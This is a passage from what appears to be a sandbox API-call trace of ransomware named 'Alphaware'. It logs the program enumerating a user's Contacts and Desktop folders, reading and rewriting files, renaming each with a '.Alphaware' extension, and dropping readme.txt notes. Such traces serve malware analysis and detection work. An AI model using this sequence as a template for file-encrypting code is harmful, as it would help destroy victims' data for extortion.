ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x8c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive.lnk.Alphaware", cAlternateFileName="ONEDRI~1.ALP")) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dcbca0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x82dcbca0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82dcbca0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82ed6640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk.Alphaware", cAlternateFileName="RECENT~1.ALP")) returned 1 [0081.749] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82ed6640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk.Alphaware", cAlternateFileName="RECENT~1.ALP")) returned 0 [0081.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0081.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0081.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0081.750] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.750] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0081.750] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0081.750] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0081.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0081.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0081.750] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact", dwFileAttributes=0x80) returned 1 [0081.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.751] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x26299b0 | out: lpFileInformation=0x26299b0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e)) returned 1 [0081.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.751] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.751] ReadFile (in: hFile=0x254, lpBuffer=0x2629c28, nNumberOfBytesToRead=0x10b1e, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2629c28*, lpNumberOfBytesRead=0x23eb38*=0x10b1e, lpOverlapped=0x0) returned 1 [0081.782] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x31 [0081.782] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0081.782] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.784] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0081.787] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact", lpFilePart=0x0) returned 0x31 [0081.787] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact.Alphaware", lpFilePart=0x0) returned 0x3b [0081.787] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0081.787] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82f22900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x164f4)) returned 1 [0081.787] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0081.787] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact"), lpNewFileName="C:\\Users\\kEecfMwgj\\Contacts\\Administrator.contact.Alphaware" (normalized: "c:\\users\\keecfmwgj\\contacts\\administrator.contact.alphaware")) returned 1 [0081.788] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\readme.txt", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Contacts\\readme.txt", lpFilePart=0x0) returned 0x26 [0081.789] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0081.789] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\contacts\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.789] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0081.804] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini", lpFilePart=0x0) returned 0x27 [0081.804] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini", dwFileAttributes=0x80) returned 1 [0081.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0081.805] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x2491e70 | out: lpFileInformation=0x2491e70*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f9530, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x19c)) returned 1 [0081.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0081.805] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini", lpFilePart=0x0) returned 0x27 [0081.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0081.805] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\contacts\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0081.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0081.805] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x19c [0081.805] ReadFile (in: hFile=0x254, lpBuffer=0x2492228, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2492228*, lpNumberOfBytesRead=0x23eb38*=0x19c, lpOverlapped=0x0) returned 1 [0081.922] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0081.922] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\contacts\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0081.923] GetFileType (hFile=0x254) returned 0x1 [0081.923] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0081.923] GetFileType (hFile=0x254) returned 0x1 [0081.923] WriteFile (in: hFile=0x254, lpBuffer=0x2521a30*, nNumberOfBytesToWrite=0x2f4, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2521a30*, lpNumberOfBytesWritten=0x23e9f8*=0x2f4, lpOverlapped=0x0) returned 1 [0081.924] CloseHandle (hObject=0x254) returned 1 [0081.936] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0081.936] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\contacts\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x83079560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4)) returned 1 [0081.937] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0081.937] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini" (normalized: "c:\\users\\keecfmwgj\\contacts\\desktop.ini"), lpNewFileName="C:\\Users\\kEecfMwgj\\Contacts\\desktop.ini.Alphaware" (normalized: "c:\\users\\keecfmwgj\\contacts\\desktop.ini.alphaware")) returned 1 [0081.937] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0081.938] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts", nBufferLength=0x105, lpBuffer=0x23e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Contacts", lpFilePart=0x0) returned 0x1b [0081.938] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Contacts\\*" (normalized: "c:\\users\\keecfmwgj\\contacts\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8309f6c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8309f6c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a2b0 [0081.939] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x8309f6c0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8309f6c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.939] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82f22900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x164f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact.Alphaware", cAlternateFileName="ADMINI~1.ALP")) returned 1 [0081.939] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x83079560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0081.939] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f22900, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x82f22900, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82f22900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0081.939] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82f22900, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x82f22900, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82f22900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0081.939] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0081.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0081.939] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0081.939] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0081.939] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop", nBufferLength=0x105, lpBuffer=0x23e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop", lpFilePart=0x0) returned 0x1a [0081.940] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82766180, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a2b0 [0081.940] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82766180, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x82766180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0081.940] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb238c070, ftCreationTime.dwHighDateTime=0x1d9673d, ftLastAccessTime.dwLowDateTime=0xe75bdff0, ftLastAccessTime.dwHighDateTime=0x1d9741a, ftLastWriteTime.dwLowDateTime=0x8145b180, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc34, dwReserved0=0x0, dwReserved1=0x0, cFileName="1YPPAA.jpg.Alphaware", cAlternateFileName="1YPPAA~1.ALP")) returned 1 [0081.940] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f24b70, ftCreationTime.dwHighDateTime=0x1d972c9, ftLastAccessTime.dwLowDateTime=0x18583e30, ftLastAccessTime.dwHighDateTime=0x1d973c8, ftLastWriteTime.dwLowDateTime=0x81bcb640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b8b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="5DZrM2msfwaj.xls.Alphaware", cAlternateFileName="5DZRM2~1.ALP")) returned 1 [0081.940] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43539140, ftCreationTime.dwHighDateTime=0x1d9767d, ftLastAccessTime.dwLowDateTime=0xcbb3af70, ftLastAccessTime.dwHighDateTime=0x1d9768c, ftLastWriteTime.dwLowDateTime=0x81d222a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="6UV9xBZAU7ALhdXD5SwN.mp4.Alphaware", cAlternateFileName="6UV9XB~1.ALP")) returned 1 [0081.940] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc675d770, ftCreationTime.dwHighDateTime=0x1d973a5, ftLastAccessTime.dwLowDateTime=0xdad16ef0, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0x81dba820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x18960, dwReserved0=0x0, dwReserved1=0x0, cFileName="6XFeOIrP-7F1BPJ.mp3.Alphaware", cAlternateFileName="6XFEOI~1.ALP")) returned 1 [0081.940] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92de0080, ftCreationTime.dwHighDateTime=0x1d97379, ftLastAccessTime.dwLowDateTime=0x699b1a00, ftLastAccessTime.dwHighDateTime=0x1d97531, ftLastWriteTime.dwLowDateTime=0x81e52da0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x211c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="8-6P.wav.Alphaware", cAlternateFileName="8-6PWA~1.ALP")) returned 1 [0081.940] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e2bccb0, ftCreationTime.dwHighDateTime=0x1d97225, ftLastAccessTime.dwLowDateTime=0xd06c8650, ftLastAccessTime.dwHighDateTime=0x1d9744c, ftLastWriteTime.dwLowDateTime=0x81eeb320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14934, dwReserved0=0x0, dwReserved1=0x0, cFileName="9g0 rDMpBlzVC.swf.Alphaware", cAlternateFileName="9G0RDM~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50473680, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x50dfcd00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9ead0300, ftLastWriteTime.dwHighDateTime=0x1d98983, nFileSizeHigh=0x0, nFileSizeLow=0x10d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphaware.exe", cAlternateFileName="ALPHAW~1.EXE")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852fa510, ftCreationTime.dwHighDateTime=0x1d96d25, ftLastAccessTime.dwLowDateTime=0xff631450, ftLastAccessTime.dwHighDateTime=0x1d96d68, ftLastWriteTime.dwLowDateTime=0x81f5d740, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xbfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="c-jf 0ya1RIcN.mp4.Alphaware", cAlternateFileName="C-JF0Y~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2618a290, ftCreationTime.dwHighDateTime=0x1d96e09, ftLastAccessTime.dwLowDateTime=0x2bbd27c0, ftLastAccessTime.dwHighDateTime=0x1d96f94, ftLastWriteTime.dwLowDateTime=0x81fa9a00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x14eb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cZ6ivAAtP9f8.m4a.Alphaware", cAlternateFileName="CZ6IVA~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8201be20, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x804bb920, ftCreationTime.dwHighDateTime=0x1d972df, ftLastAccessTime.dwLowDateTime=0x1e323290, ftLastAccessTime.dwHighDateTime=0x1d97614, ftLastWriteTime.dwLowDateTime=0x820680e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x9008, dwReserved0=0x0, dwReserved1=0x0, cFileName="ELJrj3fRtgYOpT3c_m.mp4.Alphaware", cAlternateFileName="ELJRJ3~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9df57b0, ftCreationTime.dwHighDateTime=0x1d9684e, ftLastAccessTime.dwLowDateTime=0xcd8c2700, ftLastAccessTime.dwHighDateTime=0x1d96ddb, ftLastWriteTime.dwLowDateTime=0x820da500, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fWyG0v4r7aIxC.gif.Alphaware", cAlternateFileName="FWYG0V~1.ALP")) returned 1 [0081.941] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, 